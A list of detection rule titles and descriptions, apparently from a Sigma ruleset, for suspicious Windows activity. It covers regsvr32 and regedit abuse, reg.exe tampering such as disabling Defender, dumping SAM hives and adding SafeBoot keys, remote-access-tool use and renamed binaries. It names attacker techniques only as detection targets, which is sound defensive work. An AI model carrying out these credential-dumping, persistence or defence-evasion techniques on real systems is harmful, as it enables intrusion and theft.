Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
Exports Critical Registry Keys To a File Detects the export of a crital Registry key to a file. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Exports Registry Key To a File Detects the export of the target Registry key to a file. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Imports Registry Key From a File Detects the import of the specified file to the registry with regedit.exe. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Imports Registry Key From an ADS Detects the import of a alternate datastream to the registry with regedit.exe. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Regedit as Trusted Installer Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe https://twitter.com/1kwpeter/status/1397816101455765504
Suspicious Registry Modification From ADS Via Regini.EXE Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini
Registry Modification Via Regini.EXE Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini
DLL Execution Via Register-cimprovider.exe Detects using register-cimprovider.exe to execute arbitrary dll file. https://twitter.com/PhilipTsukerman/status/992021361106268161, https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/
Enumeration for 3rd Party Creds From CLI Detects processes that query known 3rd party registry keys that holds credentials via commandline https://isc.sans.edu/diary/More+Data+Exfiltration/25698, https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt, https://github.com/HyperSine/how-does-MobaXterm-encrypt-password, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry
Suspicious Debugger Registration Cmdline Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content
Potential Persistence Via Logon Scripts - CommandLine Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html
Potential Credential Dumping Attempt Using New NetworkProvider - CLI Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Python Function Execution Security Warning Disabled In Excel Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
Potential Privilege Escalation via Service Permissions Weakness Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/31/insecure-registry-permissions/
Potential Provisioning Registry Key Abuse For Binary Proxy Execution Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Potential PowerShell Execution Policy Tampering - ProcCreation Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
Hiding User Account Via SpecialAccounts Registry Key - CommandLine Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/, https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/, https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Persistence Via TypedPaths - CommandLine Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html
Potential Regsvr32 Commandline Flag Anomaly Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. https://twitter.com/sbousseaden/status/1282441816986484737?s=12
Potentially Suspicious Regsvr32 HTTP IP Pattern Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
Potentially Suspicious Regsvr32 HTTP/FTP Pattern Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
Suspicious Regsvr32 Execution From Remote Share Detects REGSVR32.exe to execute DLL hosted on remote shares https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
Potentially Suspicious Child Process Of Regsvr32 Detects potentially suspicious child processes of "regsvr32.exe". https://redcanary.com/blog/intelligence-insights-april-2022/, https://www.echotrail.io/insights/search/regsvr32.exe, https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo
Regsvr32 Execution From Potential Suspicious Location Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Regsvr32 Execution From Highly Suspicious Location Detects execution of regsvr32 where the DLL is located in a highly suspicious locations Internal Research
Regsvr32 DLL Execution With Suspicious File Extension Detects the execution of REGSVR32.exe with DLL files masquerading as other files https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/, https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://guides.lib.umich.edu/c.php?g=282942&p=1885348
Scripting/CommandLine Process Spawned Regsvr32 Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Regsvr32 DLL Execution With Uncommon Extension Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Potential Persistence Attempt Via Run Keys Using Reg.EXE Detects suspicious command line reg.exe tool adding key to RUN key in Registry https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/, https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
Add SafeBoot Keys Via Reg Utility Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/
Suspicious Reg Add BitLocker Detects suspicious addition to BitLocker related registry keys via the reg.exe utility https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/
Dropping Of Password Filter DLL Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/, https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter
SafeBoot Registry Key Deleted Via Reg.EXE Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/
Service Registry Key Deleted Via Reg.EXE Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
Potentially Suspicious Desktop Background Change Using Reg.EXE Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image. https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI
Direct Autorun Keys Modification Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
Security Service Disabled Via Reg.EXE Detects execution of "reg.exe" to disable security services such as Windows Defender. https://twitter.com/JohnLaTwC/status/1415295021041979392, https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1, https://vms.drweb.fr/virus/?i=24144899, https://bidouillesecurity.com/disable-windows-defender-in-powershell/
Dumping of Sensitive Hives Via Reg.EXE Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md, https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
Windows Recall Feature Enabled Via Reg.EXE Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Potential Suspicious Registry File Imported Via Reg.EXE Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import
LSA PPL Protection Disabled Via Reg.EXE Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
Modify Group Policy Settings Detect malicious GPO modifications can be used to implement many other malicious behaviors. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md
Suspicious Reg Add Open Command Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key https://thedfirreport.com/2021/12/13/diavol-ransomware/
Enumeration for Credentials in Registry Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md
Enable LM Hash Storage - ProcCreation Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
RestrictedAdminMode Registry Value Tampering - ProcCreation Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Detected Windows Software Discovery Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts
Potential Tampering With RDP Related Registry Keys Via Reg.EXE Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Potential Configuration And Service Reconnaissance Via Reg.EXE Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md
Suspicious ScreenSave Change by Reg.exe Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
Changing Existing Service ImagePath Value Via Reg.EXE Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe
Reg Add Suspicious Paths Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Disabled Volume Snapshots Detects commands that temporarily turn off Volume Snapshots https://twitter.com/0gtweet/status/1354766164166115331
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/, https://github.com/swagkarna/Defeat-Defender-V1.2.0, https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2
Write Protect For Storage Disabled Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html
Suspicious Query of MachineGUID Use of reg to get MachineGuid information https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery
Remote Access Tool - AnyDesk Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
Remote Access Tool - AnyDesk Piped Password Via CLI Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. https://redcanary.com/blog/misbehaving-rats/
Remote Access Tool - AnyDesk Silent Installation Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20, https://support.anydesk.com/Automatic_Deployment
Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/, https://anydesk.com/en/changelog/windows
Remote Access Tool - Anydesk Execution From Suspicious Folder An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
Remote Access Tool - RURAT Execution From Unusual Location Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') https://redcanary.com/blog/misbehaving-rats/
Remote Access Tool - MeshAgent Command Execution via MeshCentral Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. https://github.com/Ylianst/MeshAgent, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55
Remote Access Tool - NetSupport Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
Remote Access Tool - NetSupport Execution From Unusual Location Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files') https://redcanary.com/blog/misbehaving-rats/
Remote Access Tool - GoToAssist Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows
Remote Access Tool - LogMeIn Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows
Remote Access Tool - ScreenConnect Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows
Remote Access Tool - ScreenConnect Installation Execution Detects ScreenConnect program starts that establish a remote access to a system. https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies
Remote Access Tool - ScreenConnect Remote Command Execution Detects the execution of a system command via the ScreenConnect RMM service. https://github.com/SigmaHQ/sigma/pull/4467
Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution Detects potentially suspicious child processes launched via the ScreenConnect client service. https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708, https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Remote Access Tool - ScreenConnect Server Web Shell Execution Detects potential web shell execution from the ScreenConnect server process. https://blackpointcyber.com/resources/blog/breaking-through-the-screen/, https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
Remote Access Tool - Simple Help Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Remote Access Tool - Team Viewer Session Started On Windows Host Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. Internal Research
Remote Access Tool - UltraViewer Execution An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
Discovery of a System Time Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md
Renamed AdFind Execution Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain. https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md
Renamed AutoHotkey.EXE Execution Detects execution of a renamed autohotkey.exe binary based on PE metadata fields https://www.autohotkey.com/download/, https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/
Renamed AutoIt Execution Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious. https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w, https://www.autoitscript.com/site/
Potential Defense Evasion Via Binary Rename Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process
Potential Defense Evasion Via Rename Of Highly Relevant Binaries Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks, https://twitter.com/christophetd/status/1164506034720952320, https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
Renamed BOINC Client Execution Detects the execution of a renamed BOINC binary. https://boinc.berkeley.edu/, https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Renamed BrowserCore.EXE Execution Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) https://twitter.com/mariuszbit/status/1531631015139102720
Renamed Cloudflared.EXE Execution Detects the execution of a renamed "cloudflared" binary. https://github.com/cloudflare/cloudflared/releases, https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
Renamed CreateDump Utility Execution Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960
Renamed CURL.EXE Execution Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields https://twitter.com/Kostastsale/status/1700965142828290260
Renamed ZOHO Dctask64 Execution Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution. https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424
Renamed FTP.EXE Execution Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields https://lolbas-project.github.io/lolbas/Binaries/Ftp/
